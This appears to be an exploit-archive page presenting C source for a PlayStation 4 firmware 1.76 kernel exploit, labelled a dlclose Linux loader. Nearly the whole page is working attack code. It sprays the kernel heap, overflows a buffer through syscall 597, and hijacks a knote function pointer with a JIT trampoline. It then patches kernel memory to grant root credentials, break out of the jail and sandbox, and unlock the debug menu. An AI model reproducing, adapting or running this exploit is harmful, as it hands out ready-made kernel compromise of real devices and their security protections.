sony playstation 4 (ps4) 1.76 dlclose linux kernel loader

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sony playstation 4 (ps4) 1.76 dlclose linux kernel loader Code Code...
/* Code written based on info available here See attached LICENCE file Thanks to CTurt and qwertyoruiop - @kr105rlz Download: */ #include "ps4.h" #define DEBUG_SOCKET #include "defines.h" static int sock; static void *dump; void payload(struct knote *kn) { struct thread *td; struct ucred *cred; // Get td pointer asm volatile("mov %0, %%gs:0" : "=r"(td)); // Enable UART output uint16_t *securityflags = (uint16_t*)0xFFFFFFFF833242F6; *securityflags = *securityflags & ~(1 << 15); // bootparam_disable_console_output = 0 // Print test message to the UART line printfkernel("\n\n\n\n\n\n\n\n\nHello from kernel :-)\n\n\n\n\n\n\n\n\n"); // Disable write protection uint64_t cr0 = readCr0(); writeCr0(cr0 & ~X86_CR0_WP); // sysctl_machdep_rcmgr_debug_menu and sysctl_machdep_rcmgr_store_moe *(uint16_t *)0xFFFFFFFF82607C46 = 0x9090; *(uint16_t *)0xFFFFFFFF82607826 = 0x9090; *(char *)0xFFFFFFFF8332431A = 1; *(char *)0xFFFFFFFF83324338 = 1; // Restore write protection writeCr0(cr0); // Resolve creds cred = td->td_proc->p_ucred; // Escalate process to root cred->cr_uid = 0; cred->cr_ruid = 0; cred->cr_rgid = 0; cred->cr_groups[0] = 0; void *td_ucred = *(void **)(((char *)td) + 304); // p_ucred == td_ucred // sceSblACMgrIsSystemUcred uint64_t *sonyCred = (uint64_t *)(((char *)td_ucred) + 96); *sonyCred = 0xffffffffffffffff; // sceSblACMgrGetDeviceAccessType uint64_t *sceProcType = (uint64_t *)(((char *)td_ucred) + 88); *sceProcType = 0x3801000000000013; // Max access // sceSblACMgrHasSceProcessCapability uint64_t *sceProcCap = (uint64_t *)(((char *)td_ucred) + 104); *sceProcCap = 0xffffffffffffffff; // Sce Process ((uint64_t *)0xFFFFFFFF832CC2E8)[0] = 0x123456; //priv_check_cred bypass with suser_enabled=true ((uint64_t *)0xFFFFFFFF8323DA18)[0] = 0; // bypass priv_check // Jailbreak ;) cred->cr_prison = (void *)0xFFFFFFFF83237250; //&prison0 // Break out of the sandbox void *td_fdp = *(void **)(((char *)td->td_proc) + 72); uint64_t *td_fdp_fd_rdir = (uint64_t *)(((char *)td_fdp) + 24); uint64_t *td_fdp_fd_jdir = (uint64_t *)(((char *)td_fdp) + 32); uint64_t *rootvnode = (uint64_t *)0xFFFFFFFF832EF920; *td_fdp_fd_rdir = *rootvnode; *td_fdp_fd_jdir = *rootvnode; } // Perform kernel allocation aligned to 0x800 bytes int kernelAllocation(size_t size, int fd) { SceKernelEqueue queue = 0; sceKernelCreateEqueue(&queue, "kexec"); sceKernelAddReadEvent(queue, fd, 0, NULL); return queue; } void kernelFree(int allocation) { close(allocation); } void *exploitThread(void *none) { printfsocket("[+] Entered exploitThread\n"); uint64_t bufferSize = 0x8000; uint64_t overflowSize = 0x8000; uint64_t copySize = bufferSize + overflowSize; // Round up to nearest multiple of PAGE_SIZE uint64_t mappingSize = (copySize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1); uint8_t *mapping = mmap(NULL, mappingSize + PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); munmap(mapping + mappingSize, PAGE_SIZE); uint8_t *buffer = mapping + mappingSize - copySize; int64_t count = (0x100000000 + bufferSize) / 4; // Create structures struct knote kn; struct filterops fo; struct knote **overflow = (struct knote **)(buffer + bufferSize); overflow[2] = &kn; kn.kn_fop = &fo; // Setup trampoline to gracefully return to the calling thread void *trampw = NULL; void *trampe = NULL; int executableHandle; int writableHandle; uint8_t trampolinecode[] = { 0x58, // pop rax 0x48, 0xB8, 0x19, 0x39, 0x40, 0x82, 0xFF, 0xFF, 0xFF, 0xFF, // movabs rax, 0xffffffff82403919 0x50, // push rax 0x48, 0xB8, 0xBE, 0xBA, 0xAD, 0xDE, 0xDE, 0xC0, 0xAD, 0xDE, // movabs rax, 0xdeadc0dedeadbabe 0xFF, 0xE0 // jmp rax }; // Get Jit memory sceKernelJitCreateSharedMemory(0, PAGE_SIZE, PROT_CPU_READ | PROT_CPU_WRITE | PROT_CPU_EXEC, &executableHandle); sceKernelJitCreateAliasOfSharedMemory(executableHandle, PROT_CPU_READ | PROT_CPU_WRITE, &writableHandle); // Map r+w & r+e trampe = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_EXEC, MAP_SHARED, executableHandle, 0); trampw = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_TYPE, writableHandle, 0); // Copy trampoline to allocated address memcpy(trampw, trampolinecode, sizeof(trampolinecode)); *(void **)(trampw + 14) = (void *)payload; // Call trampoline when overflown fo.f_detach = trampe; // Start the exploit int sockets[0x2000]; int allocation[50], m = 0, m2 = 0; int fd = (bufferSize - 0x800) / 8; printfsocket("[+] Creating %d sockets\n", fd); // Create sockets for(int i = 0; i < 0x2000; i++) { sockets[i] = sceNetSocket("sss", AF_INET, SOCK_STREAM, 0); if(sockets[i] >= fd) { sockets[i + 1] = -1; break; } } // Spray the heap for(int i = 0; i < 50; i++) { allocation[i] = kernelAllocation(bufferSize, fd); printfsocket("[+] allocation = %llp\n", allocation[i]); } // Create hole for the system call's allocation m = kernelAllocation(bufferSize, fd); m2 = kernelAllocation(bufferSize, fd); kernelFree(m); // Perform the overflow int result = syscall(597, 1, mapping, &count); printfsocket("[+] Result: %d\n", result); // Execute the payload printfsocket("[+] Freeing m2\n"); kernelFree(m2); // Close sockets for(int i = 0; i < 0x2000; i++) { if(sockets[i] == -1) break; sceNetSocketClose(sockets[i]); } // Free allocations for(int i = 0; i < 50; i++) { kernelFree(allocation[i]); } // Free the mapping munmap(mapping, mappingSize); return NULL; } int _main(void) { ScePthread thread; initKernel(); initLibc(); initNetwork(); initJIT(); initPthread(); #ifdef DEBUG_SOCKET struct sockaddr_in server; server.sin_len = sizeof(server); server.sin_family = AF_INET; server.sin_addr.s_addr = IP(192, 168, 0, 4); server.sin_port = sceNetHtons(9023); memset(server.sin_zero, 0, sizeof(server.sin_zero)); sock = sceNetSocket("debug", AF_INET, SOCK_STREAM, 0); sceNetConnect(sock, (struct sockaddr *)&server, sizeof(server)); int flag = 1; sceNetSetsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(int)); dump = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); #endif printfsocket("[+] Starting...\n"); printfsocket("[+] UID = %d\n", getuid()); printfsocket("[+] GID = %d\n", getgid()); // Create exploit thread if(scePthreadCreate(&thread, NULL, exploitThread, NULL, "exploitThread") != 0) { printfsocket("[-] pthread_create error\n"); return 0; } // Wait for thread to exit scePthreadJoin(thread, NULL); // At this point we should have root and jailbreak if(getuid() != 0) { printfsocket("[-] Kernel patch failed!\n"); sceNetSocketClose(sock); return 1; } printfsocket("[+] Kernel patch success!\n"); // Enable debug menu int (*sysctlbyname)(const char *name, void *oldp, size_t *oldlenp, const void *newp, size_t newlen) = NULL; RESOLVE(libKernelHandle, sysctlbyname); uint32_t enable; size_t size; enable = 1; size = sizeof(enable); sysctlbyname("machdep.rcmgr_utoken_store_mode", NULL, NULL, &enable, size); sysctlbyname("machdep.rcmgr_debug_menu", NULL, NULL, &enable, size); #ifdef DEBUG_SOCKET munmap(dump, PAGE_SIZE); #endif printfsocket("[+] bye\n"); sceNetSocketClose(sock); return 0; }

Sony playstation 4 (ps4) 1.76 dlclose linux kernel loader Vulnerability / Exploit Source : Sony playstation 4 (ps4) 1.76 dlclose linux kernel loader

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